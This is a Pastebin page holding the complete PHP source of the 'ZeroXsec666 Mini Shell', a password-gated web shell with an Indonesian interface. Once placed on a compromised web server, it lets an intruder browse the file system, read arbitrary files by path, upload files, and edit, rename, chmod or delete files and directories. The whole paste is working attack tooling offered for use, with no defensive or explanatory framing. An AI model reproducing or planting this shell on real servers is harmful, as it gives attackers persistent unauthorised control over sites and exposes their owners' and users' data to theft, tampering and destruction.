API tools faq
paste
ZeroXsec666

ZeroXsec666 Mini Shell

ZeroXsec666
Jul 5th, 2020
80
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 10.45 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. session_start();
  3. $pass = @$_POST['pass'] ;
  4. $sv = $_SERVER['HTTP_HOST'];
  5. $password = 'henriz1987';
  6. if ($pass == $password)
  7. {
  8.     $_SESSION['barca'] = "$pass";
  9. }
  10.  if(!isset($_SESSION['barca']) or $_SESSION['barca'] != $password)
  11.  {
  12.     echo  "<html>
  13. <head>
  14. <title>Hayo Mau Dorking ya</title>
  15. <style type=>
  16. body{
  17. background-color:black;
  18.  
  19. }
  20.  
  21. input,button
  22. {  
  23.    font-size: 11pt;
  24.    color:#FF933E;
  25.    font-family: Orbitron;
  26.   border: 2px #FF933E solid;
  27.    -moz-border-radius: 5px #FF933E;
  28.    -webkit-border-radius:5px #FF933E;
  29.    border-radius:5px;
  30. }
  31. </style>
  32. </head>";
  33.  
  34.      die('<br><br><br>
  35.  <center><img src="https://s7.gifyu.com/images/5929abf369c628c994312d4998b3f23b.jpg" width="250" height="300"></center><br>
  36. <div align=center >
  37. <form method="POST" action="">
  38. <input name="pass" type="password" size="30" placeholder="Masukin passwordnya asw">
  39. <input type="submit" value="Tusboll!!">
  40. </form>
  41. <div>
  42. <body>
  43.     </html>') ;
  44.    
  45. }
  46. set_time_limit(0);
  47. error_reporting(0);
  48.  
  49. if(get_magic_quotes_gpc()){
  50. foreach($_POST as $key=>$value){
  51. $_POST[$key] = stripslashes($value);
  52. }
  53. }
  54. echo '<!DOCTYPE HTML>
  55. <html>
  56. <head>
  57. <link href="" rel="stylesheet" type="text/css">
  58. <title>ZeroXsec666 Mini Shell</title>
  59. <style>
  60. div#container{   width: 931px;   position: relative;   margin-top: 0px;   margin-left: auto;   margin-right: auto;   text-align: left;}
  61.  
  62. html {
  63. color: #FF75EE;
  64. }
  65. body {
  66.     background-image: url("https://s7.gifyu.com/images/5929abf369c628c994312d4998b3f23b.jpg");
  67.     background-size: cover;
  68.     color: #FF75EE;
  69.     font-family: ;
  70. }
  71. a {
  72. color: #FF75EE;
  73. text-decoration: none;
  74. }
  75. a:hover{
  76. color: #FF75EE;
  77. text-shadow:0px 0px 10px #ffffff;
  78. }
  79. input,select,textarea{
  80. border: 1px #FF933E solid;
  81. -moz-border-radius: 5px;
  82. -webkit-border-radius: 5px;
  83. border-radius: 5px;
  84. }
  85. #content tr:hover{
  86. background-color: #191919;
  87. text-shadow:0px 0px 10px #fff;
  88. }
  89.  
  90. #content .first{
  91. background-color: #191919;
  92. }
  93. hr {
  94. color: #FF75EE;
  95. }
  96. table{
  97. border: 1px #000000 solid;
  98. }
  99. textarea {
  100. border: 1px solid white;
  101. color: #FF75EE;
  102. background: transparent;
  103. }
  104. li {
  105. display: inline;
  106. margin: 5px;
  107. color: #FF75EE;
  108. }
  109. .i {
  110. color: #FF75EE;
  111. }
  112. input { background: transparent; color: #FF75EE; border: 1px solid #FF75EE; }
  113. select { background: transparent; color: #FF75EE; border: 1px solid #FF75EE; }
  114. .aw { background: transparent; color: aqua; border: 1px solid aqua; padding: 5px; width: 30%;}
  115. </style>
  116. </head>
  117. <body>
  118. </center>
  119. <h1>
  120. <center>
  121. <img src="https://s7.gifyu.com/images/images86dbc1740a5b2c4e.jpg"width="300"height="300"><br><br>
  122. <font color="#FF75EE">ZeroXsec666 Mini Shell</font>
  123. </center>
  124. </h1>
  125. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  126. <tr><td><font color="white">Path :</font> ';
  127. if(isset($_GET['path'])){
  128. $path = $_GET['path'];
  129. }else{
  130. $path = getcwd();
  131. }
  132. $path = str_replace('\\','/',$path);
  133. $paths = explode('/',$path);
  134.  
  135. foreach($paths as $id=>$pat){
  136. if($pat == '' && $id == 0){
  137. $a = true;
  138. echo '<a href="?path=/">/</a>';
  139. continue;
  140. }
  141. if($pat == '') continue;
  142. echo '<a href="?path=';
  143. for($i=0;$i<=$id;$i++){
  144. echo "$paths[$i]";
  145. if($i != $id) echo "/";
  146. }
  147. echo '">'.$pat.'</a>/';
  148. }
  149. echo '</td></tr><tr><td>';
  150. $file   = $_FILES['files']['name'];
  151. if(isset($_FILES['file'])){
  152. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  153. echo '<font color="lime">Berhasil Upload</font<A href="$file" target="_blank">$file</A>><br />';
  154. }else{
  155. echo '<font color="pink">Gagal Upload,Cek Permission</font><br/>';
  156. }
  157. }
  158. echo '<form enctype="multipart/form-data" method="POST">
  159. <font color="white">File Upload :</font> <input type="file" name="file" />
  160. <input type="submit" value="upload" />
  161. </form>
  162. </td></tr>';
  163. if(isset($_GET['filesrc'])){
  164. echo "<tr><td>Current File : ";
  165. echo $_GET['filesrc'];
  166. echo '</tr></td></table><br />';
  167. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  168. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  169. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  170. if($_POST['opt'] == 'chmod'){
  171. if(isset($_POST['perm'])){
  172. if(chmod($_POST['path'],$_POST['perm'])){
  173. echo '<font color="lime">Change Permission Berhasil</font><br/>';
  174. }else{
  175. echo '<font color="pink">Change Permission Gagal</font><br />';
  176. }
  177. }
  178. echo '<form method="POST">
  179. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  180. <input type="hidden" name="path" value="'.$_POST['path'].'">
  181. <input type="hidden" name="opt" value="chmod">
  182. <input type="submit" value="Go" />
  183. </form>';
  184. }elseif($_POST['opt'] == 'rename'){
  185. if(isset($_POST['newname'])){
  186. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  187. echo '<font color="lime">Ganti Nama Berhasil</font><br/>';
  188. }else{
  189. echo '<font color="pink">Ganti Nama Gagal</font><br />';
  190. }
  191. $_POST['name'] = $_POST['newname'];
  192. }
  193. echo '<form method="POST">
  194. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  195. <input type="hidden" name="path" value="'.$_POST['path'].'">
  196. <input type="hidden" name="opt" value="rename">
  197. <input type="submit" value="Go" />
  198. </form>';
  199. }elseif($_POST['opt'] == 'edit'){
  200. if(isset($_POST['src'])){
  201. $fp = fopen($_POST['path'],'w');
  202. if(fwrite($fp,$_POST['src'])){
  203. echo '<font color="lime">Berhasil Edit File, gud anjg</font><br/>';
  204. }else{
  205. echo '<font color="pink">Gagal Edit File , Cek Permission Dir :D</font><br/>';
  206. }
  207. fclose($fp);
  208. }
  209. echo '<form method="POST">
  210. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  211. <input type="hidden" name="path" value="'.$_POST['path'].'">
  212. <input type="hidden" name="opt" value="edit">
  213. <input type="submit" value="Save" />
  214. </form>';
  215. }
  216. echo '</center>';
  217. }else{
  218. echo '</table><br/><center>';
  219. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  220. if($_POST['type'] == 'dir'){
  221. if(rmdir($_POST['path'])){
  222. echo '<font color="lime">Directory Terhapus</font><br/>';
  223. }else{
  224. echo '<font color="pink">Directory Gagal Terhapus                                                                                                                                                                                                                                                                                             </font><br/>';
  225. }
  226. }elseif($_POST['type'] == 'file'){
  227. if(unlink($_POST['path'])){
  228. echo '<font color="lime">File Terhapus</font><br/>';
  229. }else{
  230. echo '<font color="pink">File Gagal Dihapus</font><br/>';
  231. }
  232. }
  233. }
  234. echo '</center>';
  235. $scandir = scandir($path);
  236. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  237. <tr class="first">
  238. <td><center>Name</peller></center></td>
  239. <td><center>Size</peller></center></td>
  240. <td><center>Permission</peller></center></td>
  241. <td><center>Modify</peller></center></td>
  242. </tr>';
  243.  
  244. foreach($scandir as $dir){
  245. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  246. echo '<tr>
  247. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  248. <td><center>--</center></td>
  249. <td><center>';
  250. if(is_writable($path.'/'.$dir)) echo '<font color="lime">';
  251. elseif(!is_readable($path.'/'.$dir)) echo '<font color="pink">';
  252. echo perms($path.'/'.$dir);
  253. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  254.  
  255. echo '</center></td>
  256. <td><center><form method="POST" action="?option&path='.$path.'">
  257. <select name="opt">
  258. <option value="">Select</option>
  259. <option value="delete">Delete</option>
  260. <option value="chmod">Chmod</option>
  261. <option value="rename">Rename</option>
  262. </select>
  263. <input type="hidden" name="type" value="dir">
  264. <input type="hidden" name="name" value="'.$dir.'">
  265. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  266. <input type="submit" value=">">
  267. </form></center></td>
  268. </tr>';
  269. }
  270. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  271. foreach($scandir as $file){
  272. if(!is_file($path.'/'.$file)) continue;
  273. $size = filesize($path.'/'.$file)/1024;
  274. $size = round($size,3);
  275. if($size >= 1024){
  276. $size = round($size/1024,2).' MB';
  277. }else{
  278. $size = $size.' KB';
  279. }
  280.  
  281. echo '<tr>
  282. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  283. <td><center>'.$size.'</center></td>
  284. <td><center>';
  285. if(is_writable($path.'/'.$file)) echo '<font color="lime">';
  286. elseif(!is_readable($path.'/'.$file)) echo '<font color="pink">';
  287. echo perms($path.'/'.$file);
  288. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  289. echo '</center></td>
  290. <td><center><form method="POST" action="?option&path='.$path.'">
  291. <select name="opt">
  292. <option value="">Select</option>
  293. <option value="delete">Delete</option>
  294. <option value="chmod">Chmod</option>
  295. <option value="rename">Rename</option>
  296. <option value="edit">Edit</option>
  297. </select>
  298. <input type="hidden" name="type" value="file">
  299. <input type="hidden" name="name" value="'.$file.'">
  300. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  301. <input type="submit" value=">">
  302. </form></center></td>
  303. </tr>';
  304.  
  305. }
  306. echo '</table>
  307. </div>';
  308. }
  309. echo "<font color='red'><br><tr><center><a href='?'>Home</a></center></font>";
  310. echo '</body>
  311. </html>';
  312. if($_GET['logout'] == true) {
  313.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  314.     echo "<script>window.location='?';</script>";
  315. }
  316. echo '<center><br/>Copyright 2020 by ZeroXsec666</center>
  317. </body>
  318. </html>';
  319. function perms($file){
  320. $perms = fileperms($file);
  321.  
  322. if (($perms & 0xC000) == 0xC000) {
  323. // Socket
  324. $info = 's';
  325. } elseif (($perms & 0xA000) == 0xA000) {
  326. // Symbolic Link
  327. $info = 'l';
  328. } elseif (($perms & 0x8000) == 0x8000) {
  329. // Regular
  330. $info = '-';
  331. } elseif (($perms & 0x6000) == 0x6000) {
  332. // Block special
  333. $info = 'b';
  334. } elseif (($perms & 0x4000) == 0x4000) {
  335. // Directory
  336. $info = 'd';
  337. } elseif (($perms & 0x2000) == 0x2000) {
  338. // Character special
  339. $info = 'c';
  340. } elseif (($perms & 0x1000) == 0x1000) {
  341. // FIFO pipe
  342. $info = 'p';
  343. } else {
  344. // Unknown
  345. $info = 'u';
  346. }
  347.  
  348. // Owner
  349. $info .= (($perms & 0x0100) ? 'r' : '-');
  350. $info .= (($perms & 0x0080) ? 'w' : '-');
  351. $info .= (($perms & 0x0040) ?
  352. (($perms & 0x0800) ? 's' : 'x' ) :
  353. (($perms & 0x0800) ? 'S' : '-'));
  354.  
  355. // Group
  356. $info .= (($perms & 0x0020) ? 'r' : '-');
  357. $info .= (($perms & 0x0010) ? 'w' : '-');
  358. $info .= (($perms & 0x0008) ?
  359. (($perms & 0x0400) ? 's' : 'x' ) :
  360. (($perms & 0x0400) ? 'S' : '-'));
  361.  
  362. // World
  363. $info .= (($perms & 0x0004) ? 'r' : '-');
  364. $info .= (($perms & 0x0002) ? 'w' : '-');
  365. $info .= (($perms & 0x0001) ?
  366. (($perms & 0x0200) ? 't' : 'x' ) :
  367. (($perms & 0x0200) ? 'T' : '-'));
  368.  
  369. return $info;
  370. }
  371. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!